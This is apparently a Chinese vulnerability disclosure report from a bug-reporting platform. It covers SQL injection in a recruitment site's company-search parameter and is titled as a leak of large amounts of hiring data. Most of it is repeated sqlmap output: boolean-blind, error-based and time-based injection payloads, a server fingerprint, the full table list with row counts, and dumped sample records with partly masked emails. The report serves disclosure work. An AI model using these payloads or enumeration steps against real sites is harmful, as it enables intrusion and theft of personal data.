2015-08-17: 细节已通知厂商并且等待厂商处理中 2015-08-20: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-08-30: 细节向核心白帽子及相关领域专家公开 2015-09-09: 细节向普通白帽子公开 2015-09-19: 细节向实习白帽子公开 2015-10-04: 细节向公众公开
大量招聘信息资料泄露
注入点
http://**.**.**.**/e/searchcompany/?id=975046
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=975046' AND 8752=8752 AND 'jsKl'='jsKl Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=975046' AND (SELECT 6138 FROM(SELECT COUNT(*),CONCAT(0x71786b7671,(SELECT (ELT(6138=6138,1))),0x716b787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'nWub'='nWub Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: id=975046' AND (SELECT * FROM (SELECT(SLEEP(10)))ZqAD) AND 'dSzD'='dSzD---web server operating system: Linux Red Hat Enterprise 5 (Tikanga)web application technology: Apache 2.2.3, PHP 5.2.17back-end DBMS: MySQL 5.0available databases [3]:[*] information_schema[*] test[*] yjssqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=975046' AND 8752=8752 AND 'jsKl'='jsKl Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=975046' AND (SELECT 6138 FROM(SELECT COUNT(*),CONCAT(0x71786b7671,(SELECT (ELT(6138=6138,1))),0x716b787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'nWub'='nWub Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: id=975046' AND (SELECT * FROM (SELECT(SLEEP(10)))ZqAD) AND 'dSzD'='dSzD---web server operating system: Linux Red Hat Enterprise 5 (Tikanga)web application technology: Apache 2.2.3, PHP 5.2.17back-end DBMS: MySQL 5.0current database: 'yjs'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=975046' AND 8752=8752 AND 'jsKl'='jsKl Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=975046' AND (SELECT 6138 FROM(SELECT COUNT(*),CONCAT(0x71786b7671,(SELECT (ELT(6138=6138,1))),0x716b787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'nWub'='nWub Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: id=975046' AND (SELECT * FROM (SELECT(SLEEP(10)))ZqAD) AND 'dSzD'='dSzD---web server operating system: Linux Red Hat Enterprise 5 (Tikanga)web application technology: Apache 2.2.3, PHP 5.2.17back-end DBMS: MySQL 5.0current user: 'bys@localhost'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=975046' AND 8752=8752 AND 'jsKl'='jsKl Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=975046' AND (SELECT 6138 FROM(SELECT COUNT(*),CONCAT(0x71786b7671,(SELECT (ELT(6138=6138,1))),0x716b787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'nWub'='nWub Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: id=975046' AND (SELECT * FROM (SELECT(SLEEP(10)))ZqAD) AND 'dSzD'='dSzD---web server operating system: Linux Red Hat Enterprise 5 (Tikanga)web application technology: Apache 2.2.3, PHP 5.2.17back-end DBMS: MySQL 5.0Database: yjs[187 tables]+-----------------------------------+| phome_ecms_article || phome_ecms_article_data_1 || phome_ecms_article_doc || phome_ecms_article_doc_data || phome_ecms_download || phome_ecms_download_data_1 || phome_ecms_download_doc || phome_ecms_download_doc_data || phome_ecms_flash || phome_ecms_flash_data_1 || phome_ecms_flash_doc || phome_ecms_flash_doc_data || phome_ecms_info || phome_ecms_info_data_1 || phome_ecms_info_doc || phome_ecms_info_doc_data || phome_ecms_infoclass_article || phome_ecms_infoclass_download || phome_ecms_infoclass_flash || phome_ecms_infoclass_info || phome_ecms_infoclass_movie || phome_ecms_infoclass_news || phome_ecms_infoclass_photo || phome_ecms_infoclass_shop || phome_ecms_infoclass_xuanjianghui || phome_ecms_infoclass_zhaopin || phome_ecms_infoclass_zhaopinhui || phome_ecms_infotmp_article || phome_ecms_infotmp_download || phome_ecms_infotmp_flash || phome_ecms_infotmp_info || phome_ecms_infotmp_movie || phome_ecms_infotmp_news || phome_ecms_infotmp_photo || phome_ecms_infotmp_shop || phome_ecms_infotmp_xuanjianghui || phome_ecms_infotmp_zhaopin || phome_ecms_infotmp_zhaopin_doc1 || phome_ecms_infotmp_zhaopinhui || phome_ecms_movie || phome_ecms_movie_data_1 || phome_ecms_movie_doc || phome_ecms_movie_doc_data || phome_ecms_news || phome_ecms_news_data_1 || phome_ecms_news_doc || phome_ecms_news_doc_data || phome_ecms_photo || phome_ecms_photo_data_1 || phome_ecms_photo_doc || phome_ecms_photo_doc_data || phome_ecms_shop || phome_ecms_shop_data_1 || phome_ecms_shop_doc || phome_ecms_shop_doc_data || phome_ecms_xuanjianghui || phome_ecms_xuanjianghui_data_1 || phome_ecms_xuanjianghui_doc || phome_ecms_xuanjianghui_doc_data || phome_ecms_zhaopin || phome_ecms_zhaopin_data_1 || phome_ecms_zhaopin_data_2 || phome_ecms_zhaopin_doc || phome_ecms_zhaopin_doc_data || phome_ecms_zhaopinhui || phome_ecms_zhaopinhui_data_1 || phome_ecms_zhaopinhui_doc || phome_ecms_zhaopinhui_doc_data || phome_enewsad || phome_enewsadclass || phome_enewsadminstyle || phome_enewsbefrom || phome_enewsbq || phome_enewsbqclass || phome_enewsbqtemp || phome_enewsbqtempclass || phome_enewsbuybak || phome_enewsbuygroup || phome_enewscard || phome_enewsclass || phome_enewsclassadd || phome_enewsclasstemp || phome_enewsclasstempclass || phome_enewsdiggips || phome_enewsdo || phome_enewsdolog || phome_enewsdownerror || phome_enewsdownrecord || phome_enewsdownurlqz || phome_enewserrorclass || phome_enewsf || phome_enewsfava || phome_enewsfavaclass || phome_enewsfeedback || phome_enewsfeedbackclass || phome_enewsfeedbackf || phome_enewsfile || phome_enewsgbook || phome_enewsgbookclass || phome_enewsgfenip || phome_enewsgroup || phome_enewshy || phome_enewshyclass || phome_enewsinfoclass || phome_enewsinfotype || phome_enewsinfovote || phome_enewsjstemp || phome_enewsjstempclass || phome_enewskey || phome_enewslink || phome_enewslinkclass || phome_enewslinktmp || phome_enewslisttemp || phome_enewslisttempclass || phome_enewslog || phome_enewsloginfail || phome_enewsmember || phome_enewsmemberadd || phome_enewsmemberf || phome_enewsmemberfeedback || phome_enewsmemberform || phome_enewsmembergbook || phome_enewsmembergroup || phome_enewsmod || phome_enewsnewstemp || phome_enewsnewstempclass || phome_enewsnotcj || phome_enewspage || phome_enewspageclass || phome_enewspayapi || phome_enewspayrecord || phome_enewspic || phome_enewspicclass || phome_enewspl || phome_enewspl_data_1 || phome_enewsplayer || phome_enewsplf || phome_enewspltemp || phome_enewspostdata || phome_enewsprinttemp || phome_enewspublic || phome_enewspubtemp || phome_enewsqmsg || phome_enewssearch || phome_enewssearchall || phome_enewssearchall_load || phome_enewssearchtemp || phome_enewssearchtempclass || phome_enewsshopdd || phome_enewsshoppayfs || phome_enewsshopps || phome_enewssp || phome_enewssp_1 || phome_enewssp_2 || phome_enewssp_3 || phome_enewssp_3_bak || phome_enewsspacestyle || phome_enewsspclass || phome_enewssql || phome_enewstable || phome_enewstags || phome_enewstagsclass || phome_enewstagsdata || phome_enewstask || phome_enewstempgroup || phome_enewstempvar || phome_enewstempvarclass || phome_enewstogzts || phome_enewsuser || phome_enewsuseradd || phome_enewsuserclass || phome_enewsuserjs || phome_enewsuserlist || phome_enewsvote || phome_enewsvotemod || phome_enewsvotetemp || phome_enewswapstyle || phome_enewswfinfo || phome_enewswfinfolog || phome_enewswords || phome_enewsworkflow || phome_enewsworkflowitem || phome_enewswriter || phome_enewsyh || phome_enewszt || phome_enewsztadd || phome_enewsztclass |+-----------------------------------+Database: yjs+-----------------------------------+---------+| Table | Entries |+-----------------------------------+---------+| phome_ecms_zhaopin | 917852 || phome_ecms_infotmp_zhaopin | 700799 || phome_ecms_zhaopin_data_2 | 636778 || phome_ecms_zhaopin_data_1 | 281133 || phome_ecms_zhaopin_doc | 48610 || phome_ecms_zhaopin_doc_data | 48610 || phome_enewsdolog | 41159 || phome_enewssearch | 28657 || phome_ecms_zhaopinhui | 13576 || phome_ecms_zhaopinhui_data_1 | 13576 || phome_ecms_xuanjianghui | 3678 || phome_ecms_xuanjianghui_data_1 | 3678 || phome_enewslog | 3676 || phome_ecms_news | 3630 || phome_ecms_news_data_1 | 3630 || phome_enewslinktmp | 2792 || phome_ecms_infotmp_zhaopinhui | 2223 || phome_ecms_infotmp_xuanjianghui | 1101 || phome_enewsfile | 485 || phome_enewspl | 361 || phome_enewspl_data_1 | 361 || phome_enewslink | 141 || phome_ecms_infotmp_news | 108 || phome_enewsinfoclass | 65 || phome_ecms_infoclass_zhaopin | 61 || phome_enewsf | 57 || phome_enewsbq | 29 || phome_enewskey | 29 || phome_enewsnewstemp | 28 || phome_enewsuser | 23 || phome_enewsuseradd | 23 || phome_enewsclass | 17 || phome_enewsbqtemp | 13 || phome_enewsmemberf | 12 || phome_enewslisttemp | 11 || phome_enewswriter | 11 || phome_enewsfeedbackf | 9 || phome_enewsclassadd | 8 || phome_enewsmember | 8 || phome_enewsmemberadd | 8 || phome_enewsshoppayfs | 6 || phome_enewstempvar | 6 || phome_enewsjstemp | 5 || phome_enewsnotcj | 5 || phome_enewsbqclass | 4 || phome_enewsdo | 4 || phome_enewslinkclass | 4 || phome_enewsmembergroup | 4 || phome_enewsmod | 4 || phome_enewsplayer | 4 || phome_enewsshopps | 4 || phome_enewstable | 4 || phome_enewsgroup | 3 || phome_enewspage | 3 || phome_enewspayapi | 3 || phome_enewspltemp | 3 || phome_enewstags | 3 || phome_enewsuserjs | 3 || phome_enewszt | 3 || phome_enewsztadd | 3 || phome_ecms_infoclass_news | 2 || phome_enewsadclass | 2 || phome_enewsadminstyle | 2 || phome_enewsclasstemp | 2 || phome_enewsmemberform | 2 || phome_enewsspacestyle | 2 || phome_enewssql | 2 || phome_enewstagsclass | 2 || phome_enewstagsdata | 2 || phome_enewsuserclass | 2 || phome_enewsvotetemp | 2 || phome_enewswapstyle | 2 || phome_enewsyh | 2 || phome_ecms_infoclass_xuanjianghui | 1 || phome_ecms_infoclass_zhaopinhui | 1 || phome_enewsfeedbackclass | 1 || phome_enewsgbookclass | 1 || phome_enewsloginfail | 1 || phome_enewspicclass | 1 || phome_enewsprinttemp | 1 || phome_enewspublic | 1 || phome_enewspubtemp | 1 || phome_enewsqmsg | 1 || phome_enewssearchtemp | 1 || phome_enewstempgroup | 1 || phome_enewsworkflow | 1 || phome_enewsztclass | 1 |+-----------------------------------+---------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=975046' AND 8752=8752 AND 'jsKl'='jsKl Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=975046' AND (SELECT 6138 FROM(SELECT COUNT(*),CONCAT(0x71786b7671,(SELECT (ELT(6138=6138,1))),0x716b787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'nWub'='nWub Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: id=975046' AND (SELECT * FROM (SELECT(SLEEP(10)))ZqAD) AND 'dSzD'='dSzD---web server operating system: Linux Red Hat Enterprise 5 (Tikanga)web application technology: Apache 2.2.3, PHP 5.2.17back-end DBMS: MySQL 5.0Database: yjsTable: phome_ecms_zhaopin[9 entries]+-----------+---------------+------------------------------------+-------------------------------------------+--------------------+-------+------------------------+| webid | didian | qiye | title | guimo | xueli | email |+-----------+---------------+------------------------------------+-------------------------------------------+--------------------+-------+------------------------+| 前程无忧 | 北京-海淀区 | 北京智通仁和科技发展有限公司 | 连锁店销售 | \\?a0\\?a0150-500人| 大专 | baidajob@**.**.**.** || 前程无忧 | 北京-海淀区 | 北京智通仁和科技发展有限公司 | 外地分公司储备销售 | \\?a0\\?a0150-500人| 大专 | baidajob@**.**.**.** || 前程无忧 | 北京-海淀区 | 北京智通仁和科技发展有限公司 | 形象专卖店销售 | \\?a0\\?a0150-500人| 大专 | baidajob@**.**.**.** || 前程无忧 | 上海-浦东新区 | 宇达电脑(上海)有限公司 | 物料规划员 | \\?a0\\?a0150-500人| 大专 | baidajob@**.**.**.** || 前程无忧 | 上海-浦东新区 | 宇达电脑(上海)有限公司 | 软件工程师 | \\?a0\\?a0150-500人| 大专 | mason.zhang@**.**.**.** || 前程无忧 | 上海-浦东新区 | 宇达电脑(上海)有限公司 | 财务分析员 | \\?a0\\?a0150-500人| 本科 | judy.mu@**.**.**.** || 前程无忧 | 上海 | 北京海辉高科软件有限公司上海分公司 | 配置管理工程师 | \\?a0\\?a0500人以上| 本科 | baidajob@**.**.**.** || 前程无忧 | 上海 | 北京海辉高科软件有限公司上海分公司 | 招聘助理(实习生) | \\?a0\\?a0500人以上| 本科 | baidajob@**.**.**.** || 前程无忧 | 上海 | 北京海辉高科软件有限公司上海分公司 | IBM(TIM/TAM) Application Support Engineer | \\?a0\\?a0500人以上| 本科 | baidajob@**.**.**.** |+-----------+---------------+------------------------------------+-------------------------------------------+--------------------+-------+------------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=975046' AND 8752=8752 AND 'jsKl'='jsKl Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=975046' AND (SELECT 6138 FROM(SELECT COUNT(*),CONCAT(0x71786b7671,(SELECT (ELT(6138=6138,1))),0x716b787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'nWub'='nWub Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: id=975046' AND (SELECT * FROM (SELECT(SLEEP(10)))ZqAD) AND 'dSzD'='dSzD---web server operating system: Linux Red Hat Enterprise 5 (Tikanga)web application technology: Apache 2.2.3, PHP 5.2.17back-end DBMS: MySQL 5.0Database: yjsTable: phome_ecms_infotmp_zhaopin[2 entries]+-----------------+----------------------------------------------------------------------+----------+| title | oldurl | username |+-----------------+----------------------------------------------------------------------+----------+| 行政文员 | http://**.**.**.**/beijing/行政 | liqing || planning leader | http://**.**.**.**/shanghai/PLANNING+LEADER_218769818250437.htm | liqing |+-----------------+----------------------------------------------------------------------+----------+
删掉了一些没用的咧
+-----------------------------------+---------+| Table | Entries |+-----------------------------------+---------+| phome_ecms_zhaopin | 917852 || phome_ecms_infotmp_zhaopin | 700799 || phome_ecms_zhaopin_data_2 | 636778 || phome_ecms_zhaopin_data_1 | 281133 || phome_ecms_zhaopin_doc | 48610 || phome_ecms_zhaopin_doc_data | 48610 || phome_enewsdolog | 41159 || phome_enewssearch | 28657 || phome_ecms_zhaopinhui | 13576 || phome_ecms_zhaopinhui_data_1 | 13576 || phome_ecms_xuanjianghui | 3678 || phome_ecms_xuanjianghui_data_1 | 3678 || phome_enewslog | 3676 || phome_ecms_news | 3630 || phome_ecms_news_data_1 | 3630 || phome_enewslinktmp | 2792 || phome_ecms_infotmp_zhaopinhui | 2223 || phome_ecms_infotmp_xuanjianghui | 1101 || phome_enewsfile | 485 || phome_enewspl | 361 || phome_enewspl_data_1 | 361 || phome_enewslink | 141 || phome_ecms_infotmp_news | 108 || phome_enewsinfoclass | 65 || phome_ecms_infoclass_zhaopin | 61 || phome_enewsf | 57 || phome_enewsbq | 29 || phome_enewskey | 29 || phome_enewsnewstemp | 28 || phome_enewsuser | 23 || phome_enewsuseradd | 23 || phome_enewsclass | 17 || phome_enewsbqtemp | 13 || phome_enewsmemberf | 12 || phome_enewslisttemp | 11 || phome_enewswriter | 11 || phome_enewsfeedbackf | 9 || phome_enewsclassadd | 8 || phome_enewsmember | 8 || phome_enewsmemberadd | 8 || phome_enewsshoppayfs | 6 || phome_enewstempvar | 6 || phome_enewsjstemp | 5 || phome_enewsnotcj | 5 || phome_enewsbqclass | 4 || phome_enewsdo | 4 || phome_enewslinkclass | 4 || phome_enewsmembergroup | 4 || phome_enewsmod | 4 || phome_enewsplayer | 4 || phome_enewsshopps | 4 || phome_enewstable | 4 || phome_enewsgroup | 3 || phome_enewspage | 3 || phome_enewspayapi | 3 || phome_enewspltemp | 3 || phome_enewstags | 3 || phome_enewsuserjs | 3 || phome_enewszt | 3 || phome_enewsztadd | 3 || phome_ecms_infoclass_news | 2 || phome_enewsadclass | 2 || phome_enewsadminstyle | 2 || phome_enewsclasstemp | 2 || phome_enewsmemberform | 2 || phome_enewsspacestyle | 2 || phome_enewssql | 2 || phome_enewstagsclass | 2 || phome_enewstagsdata | 2 || phome_enewsuserclass | 2 || phome_enewsvotetemp | 2 || phome_enewswapstyle | 2 || phome_enewsyh | 2 || phome_ecms_infoclass_xuanjianghui | 1 || phome_ecms_infoclass_zhaopinhui | 1 || phome_enewsfeedbackclass | 1 || phome_enewsgbookclass | 1 || phome_enewsloginfail | 1 || phome_enewspicclass | 1 || phome_enewsprinttemp | 1 || phome_enewspublic | 1 || phome_enewspubtemp | 1 || phome_enewsqmsg | 1 || phome_enewssearchtemp | 1 || phome_enewstempgroup | 1 || phome_enewsworkflow | 1 || phome_enewsztclass | 1 |+-----------------------------------+---------+
你们专业
危害等级:高
漏洞Rank:11
确认时间:2015-08-20 08:15
暂未能建立与网站管理单位的直接处置渠道,待认领.
暂无
